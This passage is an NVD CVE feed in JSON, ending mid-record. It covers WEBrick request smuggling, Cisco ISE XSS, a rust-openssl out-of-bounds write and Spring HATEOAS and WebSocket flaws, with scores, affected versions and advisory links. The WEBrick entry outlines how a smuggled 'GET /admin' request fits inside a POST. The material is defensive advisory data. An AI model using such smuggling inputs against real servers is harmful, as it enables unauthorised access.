{"resultsPerPage":419,"startIndex":0,"totalResults":419,"format":"NVD_CVE","version":"2.0","timestamp":"2026-07-18T08:37:46.039","vulnerabilities":[{"cve":{"id":"CVE-2024-47220","sourceIdentifier":"cve@mitre.org","published":"2024-09-22T01:15:11.950","lastModified":"2026-07-17T16:17:12.300","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"An issue was discovered in the WEBrick toolkit through 1.8.1 for Ruby. It allows HTTP request smuggling by providing both a Content-Length header and a Transfer-Encoding header, e.g., \"GET /admin HTTP/1.1\\r\\n\" inside of a \"POST /user HTTP/1.1\\r\\n\" request. NOTE: the supplier's position is \"Webrick should not be used in production.\""},{"lang":"es","value":"Se descubrió un problema en el kit de herramientas WEBrick a través de la versión 1.8.1 para Ruby. Permite el contrabando de solicitudes HTTP al proporcionar un encabezado Content-Length y un encabezado Transfer-Encoding, por ejemplo, \"GET /admin HTTP/1.1\\r\\n\" dentro de una solicitud \"POST /user HTTP/1.1\\r\\n\". NOTA: la posición del proveedor es \"Webrick no debe usarse en producción\"."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]},{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","affectedData":[{"vendor":"ruby","product":"webrick","defaultStatus":"unknown","cpes":["cpe:2.3:a:ruby:webrick:*:*:*:*:*:*:*:*"],"versions":[{"version":"0","lessThanOrEqual":"1.8.1","versionType":"custom","status":"affected"}]}]}],"metrics":{"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2024-09-23T15:01:28.031073Z","id":"CVE-2024-47220","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"references":[{"url":"https://github.com/ruby/webrick/issues/145","source":"cve@mitre.org"},{"url":"https://github.com/ruby/webrick/issues/145#issuecomment-2369994610","source":"cve@mitre.org"},{"url":"https://github.com/ruby/webrick/issues/145#issuecomment-2372838285","source":"cve@mitre.org"},{"url":"https://github.com/ruby/webrick/pull/146/commits/d88321da45dcd230ac2b4585cad4833d6d5e8841","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2025-20204","sourceIdentifier":"psirt@cisco.com","published":"2025-02-05T17:15:26.077","lastModified":"2026-07-17T20:17:12.060","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Multiple vulnerabilities in the web-based management interface of Cisco Identity Services Engine (ISE) guest portals could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface.&nbsp;\r\n\r\nThese vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit these vulnerabilities by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, the attacker must have&nbsp;valid administrative credentials."},{"lang":"es","value":"Una vulnerabilidad en la interfaz de administración basada en web de Cisco Identity Services Engine (ISE) podría permitir que un atacante remoto autenticado realice ataques de cross-site scripting (XSS) contra un usuario de la interfaz. Esta vulnerabilidad se debe a una validación insuficiente de la entrada proporcionada por el usuario por parte de la interfaz de administración basada en web de un sistema afectado. Un atacante podría aprovechar esta vulnerabilidad inyectando código malicioso en páginas específicas de la interfaz. Una explotación exitosa podría permitir al atacante ejecutar código de secuencia de comandos arbitrario en el contexto de la interfaz afectada o acceder a información confidencial basada en el navegador. Para aprovechar esta vulnerabilidad, el atacante debe tener credenciales administrativas válidas."}],"affected":[{"source":"psirt@cisco.com","affectedData":[{"vendor":"Cisco","product":"Cisco Identity Services Engine Software","defaultStatus":"unknown","versions":[{"version":"3.0.0","status":"affected"},{"version":"3.0.0 p1","status":"affected"},{"version":"3.0.0 p2","status":"affected"},{"version":"3.0.0 p3","status":"affected"},{"version":"3.1.0","status":"affected"},{"version":"3.0.0 p4","status":"affected"},{"version":"3.1.0 p1","status":"affected"},{"version":"3.0.0 p5","status":"affected"},{"version":"3.1.0 p3","status":"affected"},{"version":"3.1.0 p2","status":"affected"},{"version":"3.0.0 p6","status":"affected"},{"version":"3.2.0","status":"affected"},{"version":"3.1.0 p4","status":"affected"},{"version":"3.1.0 p5","status":"affected"},{"version":"3.2.0 p1","status":"affected"},{"version":"3.0.0 p7","status":"affected"},{"version":"3.1.0 p6","status":"affected"},{"version":"3.2.0 p2","status":"affected"},{"version":"3.1.0 p7","status":"affected"},{"version":"3.3.0","status":"affected"},{"version":"3.2.0 p3","status":"affected"},{"version":"3.0.0 p8","status":"affected"},{"version":"3.2.0 p4","status":"affected"},{"version":"3.1.0 p8","status":"affected"},{"version":"3.2.0 p5","status":"affected"},{"version":"3.2.0 p6","status":"affected"},{"version":"3.1.0 p9","status":"affected"},{"version":"3.3 Patch 2","status":"affected"},{"version":"3.3 Patch 1","status":"affected"},{"version":"3.3 Patch 3","status":"affected"},{"version":"3.4.0","status":"affected"},{"version":"3.2.0 p7","status":"affected"},{"version":"3.3 Patch 4","status":"affected"},{"version":"3.4 Patch 1","status":"affected"},{"version":"3.1.0 p10","status":"affected"},{"version":"3.3 Patch 5","status":"affected"},{"version":"3.3 Patch 6","status":"affected"},{"version":"3.4 Patch 2","status":"affected"},{"version":"3.3 Patch 7","status":"affected"},{"version":"3.4 Patch 3","status":"affected"},{"version":"3.4 Patch 4","status":"affected"},{"version":"3.3 Patch 8","status":"affected"},{"version":"3.2 Patch 8","status":"affected"},{"version":"3.3 Patch 9","status":"affected"},{"version":"3.2 Patch 9","status":"affected"},{"version":"3.4 Patch 5","status":"affected"},{"version":"3.3 Patch 10","status":"affected"},{"version":"3.3 Patch 11","status":"affected"},{"version":"3.4 Patch 6","status":"affected"},{"version":"3.2 Patch 10","status":"affected"},{"version":"3.1.0 p72","status":"affected"},{"version":"3.1.0 p11","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@cisco.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N","baseScore":4.8,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.7,"impactScore":2.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N","baseScore":4.8,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.7,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2025-02-05T16:58:54.571046Z","id":"CVE-2025-20204","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@cisco.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:*:*:*:*:*:*:*:*","versionStartIncluding":"3.0.0","versionEndExcluding":"3.2","matchCriteriaId":"AB8613FB-8E3D-4DA9-9A1D-9161090C7890"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.2.0:-:*:*:*:*:*:*","matchCriteriaId":"7932D5D5-83E1-4BEF-845A-D0783D4BB750"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch1:*:*:*:*:*:*","matchCriteriaId":"1B818846-4A6E-4256-B344-281E8C786C43"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch2:*:*:*:*:*:*","matchCriteriaId":"A44858A2-922A-425A-8B38-0C47DB911A3C"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch3:*:*:*:*:*:*","matchCriteriaId":"53484A32-757B-42F8-B655-554C34222060"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch4:*:*:*:*:*:*","matchCriteriaId":"0CCAC61F-C273-49B3-A631-31D3AE3EB148"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch5:*:*:*:*:*:*","matchCriteriaId":"51AEFCE6-FB4A-4B1C-A23D-83CC3CF3FBBD"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch6:*:*:*:*:*:*","matchCriteriaId":"B452B4F0-8510-475E-9AE8-B48FABB4D7D3"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch7:*:*:*:*:*:*","matchCriteriaId":"5733512D-12B5-4098-AF90-9D68217FAC27"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.3.0:-:*:*:*:*:*:*","matchCriteriaId":"F1B9C2C1-59A4-49A0-9B74-83CCB063E55D"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch1:*:*:*:*:*:*","matchCriteriaId":"DFD29A0B-0D75-4EAB-BCE0-79450EC75DD0"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch2:*:*:*:*:*:*","matchCriteriaId":"E6C94CC4-CC08-4DAF-A606-FDAFC92720A9"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.4.0:-:*:*:*:*:*:*","matchCriteriaId":"D23905E0-E525-49B1-8E5F-4EB42D186768"}]}]}],"references":[{"url":"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-xss-42tgsdMG","source":"psirt@cisco.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2025-20205","sourceIdentifier":"psirt@cisco.com","published":"2025-02-05T17:15:26.243","lastModified":"2026-07-17T20:17:13.067","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Multiple vulnerabilities in the web-based management interface of Cisco Identity Services Engine (ISE) guest portals could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface.&nbsp;\r\n\r\nThese vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit these vulnerabilities by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, the attacker must have&nbsp;valid administrative credentials."},{"lang":"es","value":"Una vulnerabilidad en la interfaz de administración basada en web de Cisco Identity Services Engine (ISE) podría permitir que un atacante remoto autenticado realice ataques de cross-site scripting (XSS) contra un usuario de la interfaz. Esta vulnerabilidad se debe a una validación insuficiente de la entrada proporcionada por el usuario por parte de la interfaz de administración basada en web de un sistema afectado. Un atacante podría aprovechar esta vulnerabilidad inyectando código malicioso en páginas específicas de la interfaz. Una explotación exitosa podría permitir al atacante ejecutar código de secuencia de comandos arbitrario en el contexto de la interfaz afectada o acceder a información confidencial basada en el navegador. Para aprovechar esta vulnerabilidad, el atacante debe tener credenciales administrativas válidas."}],"affected":[{"source":"psirt@cisco.com","affectedData":[{"vendor":"Cisco","product":"Cisco Identity Services Engine Software","defaultStatus":"unknown","versions":[{"version":"3.0.0","status":"affected"},{"version":"3.0.0 p1","status":"affected"},{"version":"3.0.0 p2","status":"affected"},{"version":"3.0.0 p3","status":"affected"},{"version":"3.1.0","status":"affected"},{"version":"3.0.0 p4","status":"affected"},{"version":"3.1.0 p1","status":"affected"},{"version":"3.0.0 p5","status":"affected"},{"version":"3.1.0 p3","status":"affected"},{"version":"3.1.0 p2","status":"affected"},{"version":"3.0.0 p6","status":"affected"},{"version":"3.2.0","status":"affected"},{"version":"3.1.0 p4","status":"affected"},{"version":"3.1.0 p5","status":"affected"},{"version":"3.2.0 p1","status":"affected"},{"version":"3.0.0 p7","status":"affected"},{"version":"3.1.0 p6","status":"affected"},{"version":"3.2.0 p2","status":"affected"},{"version":"3.1.0 p7","status":"affected"},{"version":"3.3.0","status":"affected"},{"version":"3.2.0 p3","status":"affected"},{"version":"3.0.0 p8","status":"affected"},{"version":"3.2.0 p4","status":"affected"},{"version":"3.1.0 p8","status":"affected"},{"version":"3.2.0 p5","status":"affected"},{"version":"3.2.0 p6","status":"affected"},{"version":"3.1.0 p9","status":"affected"},{"version":"3.3 Patch 2","status":"affected"},{"version":"3.3 Patch 1","status":"affected"},{"version":"3.3 Patch 3","status":"affected"},{"version":"3.4.0","status":"affected"},{"version":"3.2.0 p7","status":"affected"},{"version":"3.3 Patch 4","status":"affected"},{"version":"3.4 Patch 1","status":"affected"},{"version":"3.1.0 p10","status":"affected"},{"version":"3.3 Patch 5","status":"affected"},{"version":"3.3 Patch 6","status":"affected"},{"version":"3.4 Patch 2","status":"affected"},{"version":"3.3 Patch 7","status":"affected"},{"version":"3.4 Patch 3","status":"affected"},{"version":"3.5.0","status":"affected"},{"version":"3.4 Patch 4","status":"affected"},{"version":"3.3 Patch 8","status":"affected"},{"version":"3.2 Patch 8","status":"affected"},{"version":"3.5 Patch 1","status":"affected"},{"version":"3.3 Patch 9","status":"affected"},{"version":"3.2 Patch 9","status":"affected"},{"version":"3.4 Patch 5","status":"affected"},{"version":"3.5 Patch 3","status":"affected"},{"version":"3.5 Patch 2","status":"affected"},{"version":"3.3 Patch 10","status":"affected"},{"version":"3.3 Patch 11","status":"affected"},{"version":"3.4 Patch 6","status":"affected"},{"version":"3.2 Patch 10","status":"affected"},{"version":"3.1.0 p72","status":"affected"},{"version":"3.1.0 p11","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@cisco.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N","baseScore":4.8,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.7,"impactScore":2.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N","baseScore":4.8,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.7,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2025-02-05T16:58:34.078308Z","id":"CVE-2025-20205","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@cisco.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:*:*:*:*:*:*:*:*","versionStartIncluding":"3.0.0","versionEndExcluding":"3.2","matchCriteriaId":"AB8613FB-8E3D-4DA9-9A1D-9161090C7890"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.2.0:-:*:*:*:*:*:*","matchCriteriaId":"7932D5D5-83E1-4BEF-845A-D0783D4BB750"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch1:*:*:*:*:*:*","matchCriteriaId":"1B818846-4A6E-4256-B344-281E8C786C43"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch2:*:*:*:*:*:*","matchCriteriaId":"A44858A2-922A-425A-8B38-0C47DB911A3C"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch3:*:*:*:*:*:*","matchCriteriaId":"53484A32-757B-42F8-B655-554C34222060"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch4:*:*:*:*:*:*","matchCriteriaId":"0CCAC61F-C273-49B3-A631-31D3AE3EB148"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch5:*:*:*:*:*:*","matchCriteriaId":"51AEFCE6-FB4A-4B1C-A23D-83CC3CF3FBBD"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch6:*:*:*:*:*:*","matchCriteriaId":"B452B4F0-8510-475E-9AE8-B48FABB4D7D3"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.3.0:-:*:*:*:*:*:*","matchCriteriaId":"F1B9C2C1-59A4-49A0-9B74-83CCB063E55D"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch1:*:*:*:*:*:*","matchCriteriaId":"DFD29A0B-0D75-4EAB-BCE0-79450EC75DD0"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch2:*:*:*:*:*:*","matchCriteriaId":"E6C94CC4-CC08-4DAF-A606-FDAFC92720A9"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch3:*:*:*:*:*:*","matchCriteriaId":"BB069EA3-7B8C-42B5-8035-2EE5ED3F56E4"},{"vulnerable":true,"criteria":"cpe:2.3:a:cisco:identity_services_engine:3.4.0:-:*:*:*:*:*:*","matchCriteriaId":"D23905E0-E525-49B1-8E5F-4EB42D186768"}]}]}],"references":[{"url":"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-xss-42tgsdMG","source":"psirt@cisco.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41678","sourceIdentifier":"security-advisories@github.com","published":"2026-04-24T18:16:29.420","lastModified":"2026-07-17T19:24:37.190","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"rust-openssl provides OpenSSL bindings for the Rust programming language.  From  to before 0.10.78, aes::unwrap_key() contains an incorrect assertion: it checks that out.len() + 8 <= in_.len(), but this condition is reversed. The intended invariant is out.len() >= in_.len() - 8, ensuring the output buffer is large enough. Because of the inverted check, the function only accepts buffers at or below the minimum required size and rejects larger ones. If a smaller buffer is provided the function will write past the end of out by in_.len() - 8 - out.len() bytes, causing an out-of-bounds write from a safe public function. This vulnerability is fixed in 0.10.78."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"rust-openssl","product":"rust-openssl","versions":[{"version":">= 0.10.24, < 0.10.78","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"UNREPORTED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-04-24T18:27:46.176271Z","id":"CVE-2026-41678","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-787"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:rust-openssl_project:rust-openssl:*:*:*:*:*:rust:*:*","versionStartIncluding":"0.10.24","versionEndExcluding":"0.10.78","matchCriteriaId":"0A17A0AA-DE7E-478E-B869-163E3D5B690F"}]}]}],"references":[{"url":"https://github.com/rust-openssl/rust-openssl/security/advisories/GHSA-8c75-8mhr-p7r9","source":"security-advisories@github.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41006","sourceIdentifier":"security@vmware.com","published":"2026-06-09T05:16:34.910","lastModified":"2026-07-17T20:28:17.400","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring HATEOAS's internal PropertyUtils.createObjectFromProperties method, used by the Collection+JSON and UBER media type deserializers, performs bean property binding via reflection without consulting Jackson access-control annotations.\n\nAffected versions:\nSpring HATEOAS 1.5.0 through 1.5.6; 2.3.0 through 2.3.4; 2.4.0 through 2.4.1; 2.5.0 through 2.5.2; 3.0.0 through 3.0.3."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring HATEOAS","defaultStatus":"unaffected","versions":[{"version":"1.5.0","lessThan":"1.5.7","versionType":"custom","status":"affected"},{"version":"2.3.0","lessThan":"2.3.5","versionType":"custom","status":"affected"},{"version":"2.4.0","lessThan":"2.4.2","versionType":"custom","status":"affected"},{"version":"2.5.0","lessThan":"2.5.2.1","versionType":"custom","status":"affected"},{"version":"3.0.0","lessThan":"3.0.3.1","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-09T13:23:51.414122Z","id":"CVE-2026-41006","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-284"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"NVD-CWE-noinfo"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_hateoas:*:*:*:*:*:*:*:*","versionStartIncluding":"1.5.0","versionEndExcluding":"1.5.7","matchCriteriaId":"BDC8F2F3-36B9-4A55-9236-EB203C6C9294"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_hateoas:*:*:*:*:*:*:*:*","versionStartIncluding":"2.3.0","versionEndExcluding":"2.3.5","matchCriteriaId":"18A5CFEA-46B3-4A49-B165-57DF0DDF14B6"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_hateoas:*:*:*:*:*:*:*:*","versionStartIncluding":"2.4.0","versionEndExcluding":"2.4.2","matchCriteriaId":"F41D9168-E28B-4C1A-AA63-B643826DA027"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_hateoas:*:*:*:*:*:*:*:*","versionStartIncluding":"2.5.0","versionEndExcluding":"2.5.2.1","matchCriteriaId":"68DAC9FC-565F-488C-8827-5128E3B3D1F5"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_hateoas:*:*:*:*:*:*:*:*","versionStartIncluding":"3.0.0","versionEndExcluding":"3.0.3.1","matchCriteriaId":"1DC3C81E-7656-47A8-A76F-474DB239EECD"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41006","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41007","sourceIdentifier":"security@vmware.com","published":"2026-06-09T05:16:35.033","lastModified":"2026-07-17T20:28:37.020","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring HATEOAS maintains an unbounded static cache of StringLinkRelation instances keyed on attacker-supplied strings.\n\nAffected versions:\nSpring HATEOAS 1.5.0 through 1.5.6; 2.3.0 through 2.3.4; 2.4.0 through 2.4.1; 2.5.0 through 2.5.2; 3.0.0 through 3.0.3."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring HATEOAS","defaultStatus":"unaffected","versions":[{"version":"1.5.0","lessThan":"1.5.7","versionType":"custom","status":"affected"},{"version":"2.3.0","lessThan":"2.3.5","versionType":"custom","status":"affected"},{"version":"2.4.0","lessThan":"2.4.2","versionType":"custom","status":"affected"},{"version":"2.5.0","lessThan":"2.5.2.1","versionType":"custom","status":"affected"},{"version":"3.0.0","lessThan":"3.0.3.1","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-09T13:20:13.843253Z","id":"CVE-2026-41007","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-770"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_hateoas:*:*:*:*:*:*:*:*","versionStartIncluding":"1.5.0","versionEndExcluding":"1.5.7","matchCriteriaId":"BDC8F2F3-36B9-4A55-9236-EB203C6C9294"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_hateoas:*:*:*:*:*:*:*:*","versionStartIncluding":"2.3.0","versionEndExcluding":"2.3.5","matchCriteriaId":"18A5CFEA-46B3-4A49-B165-57DF0DDF14B6"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_hateoas:*:*:*:*:*:*:*:*","versionStartIncluding":"2.4.0","versionEndExcluding":"2.4.2","matchCriteriaId":"F41D9168-E28B-4C1A-AA63-B643826DA027"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_hateoas:*:*:*:*:*:*:*:*","versionStartIncluding":"2.5.0","versionEndExcluding":"2.5.2.1","matchCriteriaId":"68DAC9FC-565F-488C-8827-5128E3B3D1F5"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_hateoas:*:*:*:*:*:*:*:*","versionStartIncluding":"3.0.0","versionEndExcluding":"3.0.3.1","matchCriteriaId":"1DC3C81E-7656-47A8-A76F-474DB239EECD"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41007","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41838","sourceIdentifier":"security@vmware.com","published":"2026-06-09T05:16:35.723","lastModified":"2026-07-17T20:16:14.573","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"IDs for WebSocket sessions in the spring-websocket module are not cryptographically unpredictable, which may be possible to exploit in combination with inadequate authorization rules.\n\nAffected versions:\nSpring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 